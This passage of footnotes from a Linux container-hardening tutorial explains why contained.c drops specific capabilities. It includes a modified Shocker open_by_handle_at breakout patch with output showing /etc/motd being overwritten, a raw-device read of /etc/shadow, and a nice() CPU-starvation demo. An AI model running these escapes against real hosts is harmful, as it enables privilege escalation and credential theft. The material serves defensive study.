 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
 		CAP_SETFCAP,
 		CAP_SYSLOG,
-		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
 		CAP_SYS_NICE,

Note that CAP_SYS_ADMIN doesn't need to be allowed for this to work; mount is just more convenient than reading the block device in userspace.
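
The two numbers passed to cap_mknod are the device's major and minor numbers; 8:1 is conventionally the first partition of the first SCSI/SATA disk. cap_mknod.c uses atoi, which accepts garbage silently. Here's a slightly stricter sketch of the same parsing; the function name parse_dev is made up.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/sysmacros.h>
#include <sys/types.h>

/* Parse decimal major and minor strings into a dev_t.
 * Returns 0 on success, -1 if either string isn't a plain number. */
int parse_dev(const char *maj, const char *min, dev_t *out)
{
	char *end = NULL;

	errno = 0;
	unsigned long ma = strtoul(maj, &end, 10);
	if (errno || end == maj || *end != '\0')
		return -1;

	errno = 0;
	unsigned long mi = strtoul(min, &end, 10);
	if (errno || end == min || *end != '\0')
		return -1;

	*out = makedev(ma, mi);
	return 0;
}
```

major() and minor() from the same header split a dev_t back into its two parts.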

[lizzie@empress l-c-i-500-l]$  sudo  ./contained -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.VTnW1G...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ mknod failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ make contained.allow_capmknod
patch contained.c -i allow_capmknod.diff -o contained.allow_capmknod.c
patching file contained.allow_capmknod.c (read from contained.c)
Hunk #1 succeeded at 46 (offset 8 lines).
cc -Wall -Werror -lseccomp -lcap contained.allow_capmknod.c -o contained.allow_capmknod
rm contained.allow_capmknod.c
[lizzie@empress l-c-i-500-l]$  sudo  ./contained.allow_capmknod -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.fdbi8q...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ reading /etc/shadow:
[redacted]
=> cleaning cgroups...done.

¹⁹

Listing 48: setfcap_and_exec.c

/* -*- compile-command: "gcc -Wall -Werror setfcap_and_exec.c -o setfcap_and_exec  -static -lcap" -*- */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <linux/capability.h>
#include <sys/capability.h>
#include <sys/prctl.h>
#include <sys/types.h>

int main (int argc, char  **argv)
{
	if (argc == 2 && !strcmp(argv[1], "inner")) {
		cap_t self_caps = {0};
		if (!(self_caps = cap_get_proc())) {
			fprintf(stderr, "++ cap_get_proc failed: %m\n");
			return 1;
		}

		cap_flag_value_t cap_mknod_status = CAP_CLEAR;
		if (cap_get_flag(self_caps, CAP_MKNOD, CAP_PERMITTED, &cap_mknod_status)) {
			fprintf(stderr, "++ cap_get_flag failed: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_mknod_status == CAP_CLEAR)
			fprintf(stderr, "!! don't have cap_mknod+p?\n");

		if (cap_set_flag(self_caps, CAP_EFFECTIVE, 1,
				 & (cap_value_t) { CAP_MKNOD }, CAP_SET)) {
			fprintf(stderr, "++ can't cap_set_flag: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_set_proc(self_caps)) {
			fprintf(stderr, "++ can't cap_set_proc: %m\n");
			cap_free(self_caps);
			return 1;
		}
		cap_free(self_caps);
		fprintf(stderr, "++ have CAP_MKNOD!\n");
	} else {
		cap_t file_caps = {0};
		if (!(file_caps = cap_from_text("cap_mknod+p"))) {
			fprintf(stderr, "++ cap_from_text failed: %m\n");
			return 1;
		}
		if (cap_set_file(argv[0], file_caps)) {
			fprintf(stderr, "++ cap_set_file failed: %m\n");
			cap_free(file_caps);
			return 1;
		}
		cap_free(file_caps);

		if (execve(argv[0], (char  *[]){ argv[0], "inner", 0 }, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	}
	return 0;
}

Listing 49: allow_capsetfcap.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..0f3a4e2 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -39,7 +39,6 @@ int capabilities()
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
 		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GCu2Ry...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
!! don't have cap_mknod+p?
++ can't cap_set_proc: Operation not permitted
=> cleaning cgroups...done.

It does work if we don't drop CAP_MKNOD, so it seems a process can't use file capabilities to regain a capability it has dropped:

Listing 50: allow_capmknod_capsetfcap.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b458201 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,8 +38,6 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capmknod_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.IZ1gDw...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD!
=> cleaning cgroups...done.

This disagrees with Brad Spengler's note in "False Boundaries and Arbitrary Code Execution":

CAP_SETFCAP: generic: can set full capabilities on a file, granting full capabilities upon exec

but that's 5 years old, so it may have changed.
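
One way to see why the first run fails is to ask the kernel whether a capability is still in the bounding set. This is a small sketch using prctl(PR_CAPBSET_READ); the wrapper name in_bounding_set is made up.

```c
#include <linux/capability.h>
#include <sys/prctl.h>

/* Returns 1 if cap is in the calling thread's bounding set, 0 if it has
 * been dropped, and -1 if the kernel rejects the capability number. */
int in_bounding_set(int cap)
{
	return prctl(PR_CAPBSET_READ, (unsigned long) cap, 0UL, 0UL, 0UL);
}
```

Calling in_bounding_set(CAP_MKNOD) inside the container should return 0 under the stock contained and 1 under contained.allow_capmknod_capsetfcap.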

²⁰

Listing 52: man 7 capabilities

	CAP_SYSLOG (since Linux 2.6.37)
		*  Perform   privileged   syslog(2)  operations.    See
		   syslog(2)  for   information  on   which  operations
		   require privilege.
		*  View kernel  addresses exposed  via /proc  and other
		   interfaces  when /proc/sys/kernel/kptr_restrict  has
		   the   value  1.    (See   the   discussion  of   the
		   kptr_restrict in proc(5).)

Listing 53: man 2 syslog

	SYSLOG_ACTION_READ (2)
		[...] Bytes read from the log disappear from the log
		buffer [...]

	SYSLOG_ACTION_READ_ALL (3)
		[...] The call reads the   last    len   bytes    from
		the    log   buffer (nondestructively) [...]

	SYSLOG_ACTION_READ_CLEAR (4) [...]

	SYSLOG_ACTION_CLEAR (5) [...]

	SYSLOG_ACTION_CONSOLE_OFF (6) [...]

	SYSLOG_ACTION_CONSOLE_ON (7) [...]

	SYSLOG_ACTION_CONSOLE_LEVEL (8) [...]

	SYSLOG_ACTION_SIZE_UNREAD (9) [...]

	SYSLOG_ACTION_SIZE_BUFFER (10) [...]

	All commands  except 3 and  10 require privilege.

²¹

All of the uses of CAP_SYS_BOOT:

Listing 56: kernel/reboot.c:280@c8d2bc

SYSCALL_DEFINE4(reboot, int, magic1, int, magic2, unsigned int, cmd,
		void __user *, arg)
{
	struct pid_namespace *pid_ns = task_active_pid_ns(current);
	char buffer[256];
	int ret = 0;

	/* We only trust the superuser with rebooting the system. */
	if (!ns_capable(pid_ns->user_ns, CAP_SYS_BOOT))
		return -EPERM;

	[...]
}

Listing 57: kernel/kexec.c:187@c8d2bc

SYSCALL_DEFINE4(kexec_load, unsigned long, entry, unsigned long, nr_segments,
		struct kexec_segment __user *, segments, unsigned long, flags)
{
	int result;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;

	[...]
}

Listing 58: kernel/kexec_file.c:256@c8d2bc

SYSCALL_DEFINE5(kexec_file_load, int, kernel_fd, int, initrd_fd,
		unsigned long, cmdline_len, const char __user *, cmdline_ptr,
		unsigned long, flags)
{
	int ret = 0, i;
	struct kimage **dest_image, *image;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;
	[...]
}

²²

Listing 60: kernel/module.c:931@c8d2bc

SYSCALL_DEFINE2(delete_module, const char __user *, name_user,
		unsigned int, flags)
{
	struct module *mod;
	char name[MODULE_NAME_LEN];
	int ret, forced = 0;

	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;
	[...]
}

Listing 61: kernel/module.c:3468@c8d2bc

static int may_init_module(void)
{
	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;

	return 0;
}

which is called by init_module and finit_module:

Listing 62: kernel/module.c:3759@c8d2bc

SYSCALL_DEFINE3(init_module, void __user *, umod,
		unsigned long, len, const char __user *, uargs)
{
	int err;
	struct load_info info = { };

	err = may_init_module();
	if (err)
		return err;

	pr_debug("init_module: umod=%p, len=%lu, uargs=%p\n",
	       umod, len, uargs);

	err = copy_module_from_user(umod, len, &info);
	if (err)
		return err;

	return load_module(&info, uargs, 0);
}

SYSCALL_DEFINE3(finit_module, int, fd, const char __user *, uargs, int, flags)
{
	struct load_info info = { };
	loff_t size;
	void *hdr;
	int err;

	err = may_init_module();
	if (err)
		return err;

	pr_debug("finit_module: fd=%d, uargs=%p, flags=%i\n", fd, uargs, flags);

	if (flags & ~(MODULE_INIT_IGNORE_MODVERSIONS
		      |MODULE_INIT_IGNORE_VERMAGIC))
		return -EINVAL;

	err = kernel_read_file_from_fd(fd, &hdr, &size, INT_MAX,
				       READING_MODULE);
	if (err)
		return err;
	info.hdr = hdr;
	info.len = size;

	return load_module(&info, uargs, flags);
}

²³

Listing 63: kernel/kmod.c:630@c8d2bc

static int proc_cap_handler(struct ctl_table *table, int write,
			 void __user *buffer, size_t *lenp, loff_t *ppos)
{
	struct ctl_table t;
	unsigned long cap_array[_KERNEL_CAPABILITY_U32S];
	kernel_cap_t new_cap;
	int err, i;

	if (write && (!capable(CAP_SETPCAP) ||
		      !capable(CAP_SYS_MODULE)))
		return -EPERM;

	[...]
}

which is used to authorize requests to load modules.

²⁴

Listing 64: net/core/dev_ioctl.c:349@c8d2bc

/**
 *	dev_load	- load a network module
 *	@net: the applicable net namespace
 *	@name: name of interface
 *
 *	If a network interface is not present and the process has suitable
 *	privileges this function loads the module. If module loading is not
 *	available in this kernel then it becomes a nop.
 */

void dev_load(struct net *net, const char *name)
{
	struct net_device *dev;
	int no_module;

	rcu_read_lock();
	dev = dev_get_by_name_rcu(net, name);
	rcu_read_unlock();

	no_module = !dev;
	if (no_module && capable(CAP_NET_ADMIN))
		no_module = request_module("netdev-%s", name);
	if (no_module && capable(CAP_SYS_MODULE))
		request_module("%s", name);
}

This also allows processes with only CAP_NET_ADMIN to load netdev-* modules, and is run on almost every ioctl on a network device:

Listing 65: net/core/dev_ioctl.c:381@c8d2bc

/**
 *	dev_ioctl	-	network device ioctl
 *	@net: the applicable net namespace
 *	@cmd: command to issue
 *	@arg: pointer to a struct ifreq in user space
 *
 *	Issue ioctl functions to devices. This is normally called by the
 *	user space syscall interfaces but can sometimes be useful for
 *	other purposes. The return value is the return from the syscall if
 *	positive or a negative errno code on error.
 */

int dev_ioctl(struct net *net, unsigned int cmd, void __user *arg)
{
	[...]
	/*
	 *	See which interface the caller is talking about.
	 */

	switch (cmd) {
	/*
	 *	These ioctl calls:
	 *	- can be done by all.
	 *	- atomic and do not require locking.
	 *	- return a value
	 */
	case SIOCGIFFLAGS:
	case SIOCGIFMETRIC:
	case SIOCGIFMTU:
	case SIOCGIFHWADDR:
	case SIOCGIFSLAVE:
	case SIOCGIFMAP:
	case SIOCGIFINDEX:
	case SIOCGIFTXQLEN:
		dev_load(net, ifr.ifr_name);
		[...]
}

This was pretty surprising to me! I should look into this further.

²⁵

Listing 67: man 2 nice

DESCRIPTION
	nice() adds inc  to the nice value for  the calling process.
	(A  higher  nice value  means  a  low priority.)   Only  the
	superuser  may specify  a  negative  increment, or  priority
	increase.
	[...]

ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)
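
The RLIMIT_NICE exception works out to simple arithmetic: setrlimit(2) gives the ceiling as 20 - rlim_cur. Here's a sketch of that calculation; the function names are made up. For example, going from nice 0 to -10 without CAP_SYS_NICE would need a soft limit of at least 30.

```c
#include <sys/resource.h>

/* Lowest nice value a process without CAP_SYS_NICE may lower itself to
 * for a given RLIMIT_NICE soft limit. A result of 20 means "none", since
 * nice values stop at 19. */
int nice_floor(rlim_t rlim_cur)
{
	if (rlim_cur >= 40) /* also covers RLIM_INFINITY */
		return -20;
	return 20 - (int) rlim_cur;
}

/* Same calculation for the calling process.
 * Returns 0 and stores the floor, or -1 if getrlimit failed. */
int current_nice_floor(int *floor)
{
	struct rlimit lim;
	if (getrlimit(RLIMIT_NICE, &lim) == -1)
		return -1;
	*floor = nice_floor(lim.rlim_cur);
	return 0;
}
```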

²⁶

We'll compare how much CPU time a busy loop gets on a single-core virtual machine, both on the host and in a container that can set low nice values:

Listing 68: busy_loop.c

/* -*- compile-command: "gcc -Wall -Werror -static busy_loop.c -o busy_loop" -*- */
#include <time.h>
#include <sys/times.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	struct timespec now = {0};
	struct timespec then = {0};
	clock_gettime(CLOCK_MONOTONIC, &then);
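	/* Spin for about four seconds of wall-clock time: the loop ends once
	   (seconds elapsed) * 5e9 + (nanoseconds delta) reaches 20e9. */
	do {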
		clock_gettime(CLOCK_MONOTONIC, &now);
	} while ((now.tv_sec - then.tv_sec) * 5e9
		 + now.tv_nsec - then.tv_nsec < 20e9);
	/* how much cpu time did we get? */
	struct tms tms = {0};
	if (times(&tms) == -1) {
		fprintf(stderr, "++ times failed: %m\n");
		return 1;
	}
	/*  "The tms_utime field contains the CPU time spent executing
	    instructions of the calling process.  The tms_stime field contains the
	    CPU time spent in the system while executing tasks on behalf of the
	    calling process." */
	printf("ticks: %lu\n", tms.tms_utime + tms.tms_stime);
	return 0;
}

Listing 69: nice_dos.c

/* -*- compile-command: "gcc -Wall -Werror -static nice_dos.c -o nice_dos" -*- */
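#include <errno.h>
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	/* nice() can legitimately return -1, so check errno as well. */
	errno = 0;
	if (nice(-10) == -1 && errno) {
		fprintf(stderr, "++ nice failed: %m\n");
		return 1;
	}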
	if (execve("./busy_loop", (char *[]) { "./busy_loop", 0 }, NULL)) {
		fprintf(stderr, "++ execve failed: %m\n");
		return 1;
	}
}

Listing 70: allow_capsysnice.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..4895071 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -44,7 +44,6 @@ int capabilities()
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
-		CAP_SYS_NICE,
 		CAP_SYS_RAWIO,
 		CAP_SYS_RESOURCE,
 		CAP_SYS_TIME,

alpine-kernel-dev:~# (./busy_loop && echo '^ uncontained one' &) && (sudo ./contained.allow_capsysnice -m . -u 0 -c ./nice_dos &)
=> validating Linux version...4.7.6.
=> setting cgroups...memory...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.elKMci...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
ticks: 52
^ uncontained one
ticks: 341
=> cleaning cgroups...done.
alpine-kernel-dev:~#
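
To put those tick counts in proportion: the contained, niced loop got 341 of the 393 ticks handed out, or about 87% of the CPU. A sketch of the arithmetic, with made-up helper names:

```c
#include <unistd.h>

/* Fraction of the combined CPU time that went to `mine`. */
double cpu_share(unsigned long mine, unsigned long other)
{
	unsigned long total = mine + other;
	return total ? (double) mine / (double) total : 0.0;
}

/* Convert times(2) ticks to seconds using the system's tick rate.
 * Returns a negative value if the rate can't be determined. */
double ticks_to_seconds(unsigned long ticks)
{
	long hz = sysconf(_SC_CLK_TCK);
	return hz > 0 ? (double) ticks / (double) hz : -1.0;
}
```

cpu_share(341, 52) comes out at roughly 0.87.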

²⁷

Listing 72: man 7 capabilities

	CAP_SYS_RAWIO
		* Perform I/O port operations (iopl(2) and ioperm(2));
		* access /proc/kcore;
		* employ the FIBMAP ioctl(2) operation;
		* open   devices  for   accessing  x86   model-specific
		  registers (MSRs, see msr(4))
		* update /proc/sys/vm/mmap_min_addr;
		* create memory  mappings at addresses below  the value
		  specified by /proc/sys/vm/mmap_min_addr;
		* map files in /proc/bus/pci;
		* open /dev/mem and /dev/kmem;
		* perform various SCSI device commands;
		* perform  certain operations  on hpsa(4)  and cciss(4)
		  devices;
		* perform  a  range  of device-specific  operations  on
		  other devices.

²⁸

Listing 73: man 4 mem

	/dev/mem is a character device file  that is an image of the
	main memory of  the computer.  It may be  used, for example,
	to examine (and even patch) the system.

	[...]

	It is typically created by:

		mknod -m 660 /dev/mem c 1 1
		chown root:kmem /dev/mem

	The file /dev/kmem is the  same as /dev/mem, except that the
	kernel  virtual  memory  rather   than  physical  memory  is
	accessed.  Since  Linux 2.6.26, this file  is available only
	if  the   CONFIG_DEVKMEM  kernel  configuration   option  is
	enabled.

	It is typically created by:

		mknod -m 640 /dev/kmem c 1 2
		chown root:kmem /dev/kmem

	/dev/port  is similar  to /dev/mem,  but the  I/O ports  are
	accessed.

	It is typically created by:

		mknod -m 660 /dev/port c 1 4
		chown root:kmem /dev/port

²⁹

Listing 74: man 2 ioperm

	ioperm()  sets  the  port  access permission  bits  for  the
	calling thread for num bits starting from port address from.
	If  turn_on is  nonzero, then  permission for  the specified
	bits is  enabled; otherwise it  is disabled.  If  turn_on is
	nonzero,   the    calling   thread   must    be   privileged
	(CAP_SYS_RAWIO).

Listing 75: man 2 iopl

	iopl()  changes  the  I/O  privilege level  of  the  calling
	process, as specified  by the two least  significant bits in
	level.

	This call is necessary to allow 8514-compatible X servers to
	run under  Linux.  Since these  X servers require  access to
	all 65536 I/O ports, the ioperm(2) call is not sufficient.

	In  addition  to  granting  unrestricted  I/O  port  access,
	running  at a  higher I/O  privilege level  also allows  the
	process to disable interrupts.  This will probably crash the
	system, and is not recommended.

³⁰

Listing 77: man 7 capabilities

	CAP_SYS_RESOURCE
		* Use reserved space on ext2 filesystems;
		* make ioctl(2) calls controlling ext3 journaling;
		* override disk quota limits;
		* increase resource limits (see setrlimit(2));
		* override RLIMIT_NPROC resource limit;
		* override  maximum  number   of  consoles  on  console
		  allocation;
		* override maximum number of keymaps;
		* allow more  than 64hz  interrupts from  the real-time
		  clock;
		* raise msg_qbytes  limit for a System  V message queue
		  above  the  limit   in  /proc/sys/kernel/msgmnb  (see
		  msgop(2) and msgctl(2));
		* override  the  /proc/sys/fs/pipe-size-max limit  when
		  setting the capacity of a pipe using the F_SETPIPE_SZ
		  fcntl(2) command.
		* use F_SETPIPE_SZ  to increase the capacity  of a pipe
		  above       the        limit       specified       by
		  /proc/sys/fs/pipe-max-size;
		* override  /proc/sys/fs/mqueue/queues_max  limit  when
		  creating POSIX message queues (see mq_overview(7));
		* employ prctl(2) PR_SET_MM operation;
		* set /proc/PID/oom_score_adj to a value lower than the
		  value last set by a process with CAP_SYS_RESOURCE.

³¹

Brad Spengler agrees in "False Boundaries and Arbitrary Code Execution":

No transitions known (to this author, yet): […] CAP_SYS_RESOURCE […]

³²

It turns out that you can break important things by altering the time. "Authenticated Network Time Synchronization" describes some of these:

The importance of accurate time for security. There are many examples of security mechanisms which (often implicitly) rely on having an accurate clock:

Certificate validation in TLS and other protocols. Validating a public key certificate requires confirming that the current time is within the certificate’s validity period. Performing validation with a slow or inaccurate clock may cause expired certificates to be accepted as valid. A revoked certificate may also validate if the clock is slow, since the relying party will not check for updated revocation information.

Ticket verification in Kerberos. In Kerberos, authentication tickets have a validity period, and proper verification requires an accurate clock to prevent authentication with an expired ticket.

HTTP Strict Transport Security (HSTS) policy duration. HSTS allows website administrators to protect against downgrade attacks from HTTPS to HTTP by sending a header to browsers indicating that HTTPS must be used instead of HTTP. HSTS policies specify the duration of time that HTTPS must be used. If the browser’s clock jumps ahead, the policy may expire re-allowing downgrade attacks. A related mechanism, HTTP Public Key Pinning also relies on accurate client time for security.

For clients who set their clocks using NTP, these security mechanisms (and others) can be attacked by a network-level attacker who can intercept and modify NTP traffic, such as a malicious wireless access point or an insider at an ISP. In practice, most NTP servers do not authenticate themselves to clients, so a network attacker can intercept responses and set the timestamps arbitrarily. Even if the client sends requests to multiple servers, these may all be intercepted by an upstream network device and modified to present a consistently incorrect time to a victim. Such an attack on HSTS was demonstrated by Selvi, who provided a tool to advance the clock of victims in order to expire HSTS policies. Malhotra et al. present a variety of attacks that rely on NTP being unauthenticated, further emphasizing the need for authenticated time synchronization.
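
The certificate case boils down to a comparison against whatever the clock says. Here's a deliberately tiny sketch; the struct and function are hypothetical stand-ins, not any TLS library's API.

```c
#include <stdbool.h>
#include <time.h>

/* Hypothetical, minimal stand-in for a certificate's validity period. */
struct validity {
	time_t not_before;
	time_t not_after;
};

/* True if `now` falls inside the validity period. */
bool within_validity(const struct validity *v, time_t now)
{
	return now >= v->not_before && now <= v->not_after;
}
```

If a certificate expired 500 seconds ago and something sets the clock back by 600 seconds, within_validity accepts it again. Nothing in the check can tell that the clock is wrong.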

³³

Listing 80: man 7 capabilities

       CAP_WAKE_ALARM (since Linux 3.0)
	      Trigger something that will wake up the system (set
	      CLOCK_REALTIME_ALARM and CLOCK_BOOTTIME_ALARM timers).

I had trouble finding more information about these, but "Waking systems from suspend" on LWN goes into more detail:

these timers are exposed to user space via the standard POSIX clocks and timers interface, using the new the CLOCK_REALTIME_ALARM clockid. The new clockid behaves identically to CLOCK_REALTIME except that timers set against the _ALARM clockid will wake the system if it is suspended.

³⁴

Brad Spengler's "False Boundaries and Arbitrary Code Execution":

CAP_DAC_OVERRIDE: generic: same bypass as CAP_DAC_READ_SEARCH, can also modify a non-suid binary executed by root to execute code with full privileges (modifying a suid root binary for you to execute would require CAP_FSETID, as the setuid bit is cleared on modification otherwise; thanks to Eric Paris). The modprobe sysctl can be modified as mentioned above to execute code with full capabilities.

and of course Sebastian Krahmer's email:

In 0.11 the problem is that the apps that run in the container have CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE which allows the containered app to access files not just by pathname (which would be impossible due to the bind mount of the rootfs) but also by handles via open_by_handle_at().

He might mean that the combination of both of them is problematic, though, which is absolutely true: with CAP_DAC_OVERRIDE and CAP_DAC_READ_SEARCH, it's possible to modify arbitrary files:

Listing 83: shocker_write.patch

48a49,50
> char new_motd[] = "The tea from 2014 kicks your sekurity again\n";
> 
149d150
< 	char buf[0x1000];
161,163c162
< 	       "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");
< 
< 	read(0, buf, 1);
---
> 	       "[***] forward to my friends who drink secury-tea too!      [***]\n");
169c168
< 	if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
---
> 	if (find_handle(fd1, "/etc/motd", &root_h, &h) <= 0)
175c174
< 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
---
> 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_WRONLY)) < 0)
178,180c177,179
< 	memset(buf, 0, sizeof(buf));
< 	if (read(fd2, buf, sizeof(buf) - 1) < 0)
< 		die("[-] read");
---
> 	if (write(fd2, new_motd, sizeof(new_motd)) != sizeof(new_motd))
> 		die("[-] write");
> 
182c181
< 	fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
---
> 	fprintf(stderr, "[!] Win! /etc/motd written.\n");

Listing 84: allow_capdacreadsearch.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker_write
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.axVxAE...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]
[*] Resolving 'etc/motd'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'motd'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[+] Match: motd ino=4325389
[*] Brute forcing remaining 32bit. This can take a while...
[*] (motd) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/motd written.
=> cleaning cgroups...done.

³⁵

Listing 85: allow_capdacreadsearch.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.bWoGr4...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
